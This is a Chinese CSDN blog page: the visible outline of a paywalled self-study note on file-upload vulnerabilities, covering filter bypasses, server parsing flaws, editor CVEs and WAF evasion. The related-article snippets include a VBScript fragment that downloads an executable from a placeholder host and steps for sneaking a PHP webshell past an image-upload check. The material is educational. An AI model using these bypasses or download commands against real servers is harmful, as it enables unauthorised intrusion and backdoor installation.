渗透自学(六)文件上传

最新推荐文章于 2022-11-21 14:16:27 发布
最新推荐文章于 2022-11-21 14:16:27 发布
阅读量1.2k 收藏 1
点赞数
文章标签: 安全 web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_57449919/article/details/122405928
版权
这篇博客详细探讨了文件上传漏洞的概念、危害及如何查找。内容包括前端与后端验证的绕过技巧,如黑名单、白名单、MIME类型绕过、空格和点的绕过策略。还讲解了不同服务器(IIS、Apache、Nginx)的解析漏洞,CMS及编辑器漏洞,以及CVE编号的相关安全修复。同时,提到了WAF绕过方法和文件上传漏洞的利用思路。
摘要由CSDN通过智能技术生成

基础:

  1. 概念

有文件上传就可能存在漏洞

  1. 危害

上传后门(getshell),服务器提权,获取内容权限,

  1. 如何查找与判断

目录扫描,敏感文件扫描,扫描、打开网站寻找上传点

抓包测试判断

  1. 需要注意的地方

注意文件上传类型

  1. 关于实际应用中的说明

验证/绕过:

前端:js类防护

后端:

  1. 黑名单
    1. 特殊解析后缀
    2. .htaccess解析
    3. 大小写绕过
    4. 点绕过
    5. 空格绕过
    6. ::$$DATA绕过
    7. 配合解析漏洞
    8. 双后缀名绕过
  2. 白名单
    1. MIME绕过
    2. %OO截断
    3. OxOO截断
    4. OxOa阶段
  3. 内容及其他
    1. 文件头检测
    2. 二次渲染
    3. 条件竞争
    4. 突破getimagesize
    5. 突破exif_imagetype

漏洞/修复

  1. 解析漏洞
    1. IIS6/7.X
    2. Apache
    3. Nginx
  2. CMS漏洞
    1. 1
    2. 2
    3. 3
  3. 其他漏洞
    1. 编辑器漏洞
      1. fckeitior
      2. ewebeditor
      3. ckeditor
      4. kindedit
      5. ……
    2. CVE等漏洞
      1. CVE-2015-5254
      2. CVE-2017-12615
      3. CVE-2019-2618
      4. ……
    3. 安全修复

WAF绕过

  1. safedog
  2. 宝塔
  3. XXX云盾

漏洞利用思路

  1. 常规类
    1. 扫描获取上传
最低0.47元/天 解锁文章
ecnOXong
关注
[网络安全自学篇] 五十.i春秋老师分享小白渗透之路及Web渗透技术总结
杨秀璋的专栏
03-05 2万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文讲解了Windows漏洞利用知识和DEP堆栈执行保护机制,通过构造ROP链来绕过DEP保护,并编写漏洞利用脚本并实现自动化攻击。本文将分析i春秋YOU老师的小白渗透之路,并结合作者系列文章总结Web渗透技术点,非常适合初学者学习,希望对您有所帮助~
[网络安全自学篇] .Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)
杨秀璋的专栏
04-11 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用,通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
渗透测试】一次运气很好的文件上传
HBohan的博客
10-13 456
文件上传 发现源代码泄露 打开自己珍藏已久的辣鸡字典,扫描发现存在bin.zip信息泄露,尝试进行代码审计 文件位置:SimpleDataPlatform.SimpleDataPlatform.fileUpload 找到ProccessRequest接收请求,可以看到获取了一堆参数后(初始化),后进入了HandleFiles方法, 跟进HandleFiles进行处理,如果dateType=ZBJHSB时,就继续处理请求,dateType为GET传参 路径为/Uploads/SetData/ZBJHSB.
渗透之路基础 -- 文件上传
r0cky的博客
09-18 614
具体还是要根据实战情况来判断分析,本文仅供思路学习和参考 漏洞危害 可以直接上传Shell,导致服务器getshell 漏洞形成 Web应用程序没有对上传文件的格式进行严格过滤 , 还有一部分是攻击者通过 Web服务器的解析漏洞来突破Web应用程序的防护;通常都会出现在,上传功能上 文件上传格式及解析 ​ 没有解析漏洞的情况下,格式代码必须要和文件格式一直,否则无法正常解析运行,如果存在解析漏...
渗透学习-文件上传篇-基础知识部分(持续更新中)
qq_43696276的博客
08-18 1673
文件上传漏洞也是web安全中不可忽视的一环,其对于web网站的危害性较大,因为一般如果我们能够上传了对于的webshell并且能够进行执行的话,那我们将能够拿下足够的权限。因此,要想防御好文件上传漏洞,我们就必须先学习如何利用并发现这个漏洞!!!............
渗透——内网转发之利用ftp实现文件传输
爱国小白帽
03-21 3579
FTP(File Transfer Protocol,文件传输协议) 是 TCP/IP 协议组中的协议之一。FTP协议包括两个组成部分,其一为FTP服务器,其二为FTP客户端。其中FTP服务器用来存储文件,用户可以使用FTP客户端通过FTP协议访问位于FTP服务器上的资源。在开发网站的时候,通常利用FTP协议把网页或程序传到Web服务器上。此外,由于FTP传输效率非常高,在网络上传输大的文件时,...
渗透测试中的文件传输通道1- cmd下下载文件
weixin_30316097的博客
07-08 984
Set xPost = createObject("Microsoft.XMLHTTP")xPost.Open "GET","http://www.xx.com/dc.exe",0 '下载文件的地址xPost.Send()Set sGet = createObject("ADODB.Stream")sGet.Mode = 3sGet.Type = 1sGet.Open()sGet.Write(xP...
渗透自学(一)基础知识
qq_57449919的博客
01-10 1998
渗透基础自学知识,有写的不好的地方请多多指出
渗透基础知识入门(自学笔记)
woqusss的博客
07-31 3275
渗透,要学的东西还是比较广,需要有一些基础知识作铺垫开始学,而且作为一个刚踏上学习道路不久的小伙子更应该在学习道路中不断补充更多基础知识,如编程语言,网络知识等,该篇笔记做一些基础知识的铺垫,主要围绕网络知识(域名,DNS,数据包),操作系统,数据库,Web组成架构(网站源码,操作系统,中间件,数据库),Web相关安全漏洞介绍,拓展,后门,常见的加密方式 比方说,我现在想日了某站点,那么总应该知道这个站点是哪个名字或者有什么唯一标识吧,这时候就有了IP(每一个网络和主机都会有一个逻辑地址,在交换数据
突破上传总结,用于渗透测试,很经典
08-03
网站突破上传文件的各种方法总结,渗透必备资料!
2022渗透测试-文件上传漏洞的详细讲解
保持微笑的博客
02-17 6499
目录 1.什么是文件上传漏洞 2.生成图片木马 3.靶场 1.第一关 2.前端检测(第二关) 3.服务器端检测--MIME类型(第二关) 4.服务器端检测--文件类型(第十四关) 5.服务器文件内容验证-文件头 6.服务器端检测后缀名(黑白名单) 7.%00截断(第11关) 8.htaccess攻击 9.web解析漏洞 10.编辑器上传漏洞 1.什么是文件上传漏洞 文件上传漏洞是指文件上传功能没有对上传的文件做合理严谨的过滤,导致用户可以利用此功能,上传能被服务端解析执行.
渗透测试CTF-图片隐写的详细教程2(干货)
热门推荐
保持微笑的博客
11-21 1万+
上篇文章我们介绍了这7个工具,这里简单的介绍一下。用来检测图片中是否有隐藏的文件。将图片中的隐藏文件拆分出来。①修改图片的参数来查看隐藏信息。②查看压缩包是否是伪加密。图片隐写查看神器。1个图片解密的工具暴力破解压缩包的工具。专门用来破解伪加密的一个工具。这里再分享几个工具。
00截断原理
weixin_45522644的博客
07-17 4139
0x00截断原理: 0x00是十进制表示方法,是ascii码为0的字符,在有些函数处理时,会把这个字符当做结束符。系统在对文件名的读取时,如果遇到0x00,就会认为读取已结束。这个可以用在对文件类型名的绕过上。 但要注意是文件的16进制内容里的00,而不是文件名中的00 !!!就是说系统是按16进制读取文件(或者说二进制), 遇到ascii码为零的位置就停止,而这个ascii码为零的位置在16进制中是00,用0x开头表示16进制,也就是所说的0x00截断。 %00是被服务器解码为0x00发挥了截断作用。
上传图片 webshell php,webshell后门上传流程
weixin_42522626的博客
03-17 1667
1、将webshell.php的后缀名改成jpg等图片格式,即web.jpg。2、打开相应网址,注册好账号后选择上传头像将web.jpg上传期间运行fiddler并设置断点,切换到raw界面,等到其提示相应请求代码后,将其代码段中第二个含有上传图片名称的代码改成web.php,之后继续响应请求。3、此时已经成功把后门程序上传,将服务器反馈的代码中含有路径的部分复制粘贴到网站URL后面(注意将?ph...
渗透学习-文件上传篇-靶场部分-upload-labs(持续更新中)
qq_43696276的博客
08-22 1486
在经过之前的基础知识部分的学习后,今天让我们正式开始靶场的攻克。基础知识传送门要想成为一名优秀的Hacker,就必须多动手,多实践。那么废话不多说,正式开始吧!以上就是文件上传关于upload-labs靶场的主要内容了。.........
PHP代码审计
qq_51582652的博客
03-29 1535
审计思路 web安全重点就三个词——“输入”,“输出”,“数据流”。 1、逆向追踪/回溯变量—检查敏感函数的参数,判断参数可控?是否有过滤? 搜索响应的敏感关键字,定向挖掘,高效、高质量 2、正向追踪/跟踪变量—找到哪些文件在接收外部传入的参数,跟踪 一个php_bugs靶场的示例和总结。
WEB渗透——文件上传漏洞(一)
果子哥丶的博客
03-13 1059
文件上传漏洞(一) 环境准备: OWASP_Broken_Web_Apps —— 靶机 Kali_Linux-2018.2-vm-amd64 —— 攻击机 文件上传漏洞原理: 制作PHP文件——一句话木马 chopper就是密码 利用文件上传漏洞,原本是要求上传image,但却可以上传PHP文件。上传成功后在网页加载该文件,将 …/…/hackable/uploads/Xshell....
通达OA任意文件上传+文件包含GetShell
爱国小白帽
03-28 4389
通达OA任意文件上传+文件包含GetShell 原创 li9hu [Timeline Sec](javascript:void(0)???? 昨天 本公众号专注于最新漏洞复现,欢迎关注! ------------------------------------------------------------------------------------ 本文作者:li9hu(Timeline Sec复...
网络安全渗透测试自学
最新发布
07-31
网络安全渗透测试(Penetration Testing,简称pentest)是一种通过模拟黑客攻击的方式,评估网络系统、应用程序和服务的安全漏洞的过程。它旨在帮助组织发现并修复潜在风险,提升系统的安全性。自学网络安全渗透测试通常包括以下几个步骤: 1. **基础知识学习**:了解计算机网络原理、操作系统、数据库结构、加密技术等基础,这是理解渗透测试的基础。 2. **工具的学习**:熟悉渗透测试工具,如Metasploit(用于漏洞利用)、Nmap(网络扫描)、Wireshark(数据包分析)等,并掌握如何使用它们。 3. **学习渗透策略**:了解黑客攻击链( reconnaissance, gain access, establish foothold, privilege escalation, maintain access, exfiltrate data 和 cover tracks),这涉及到社会工程学、漏洞识别和利用技巧。 4. **实践项目和模拟环境**:参与CTF(Capture The Flag)比赛、使用虚拟机或渗透测试平台进行实战练习,提升动手能力。 5. **法律法规知识**:理解和遵守相关的法律规范,比如《信息安全等级保护法》等,确保合法合规地进行测试。 6. **持续学习和认证**:关注最新威胁情报和技术更新,同时考虑获取CISSP(Certified Information Systems Security Professional)等专业认证来提高职业竞争力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值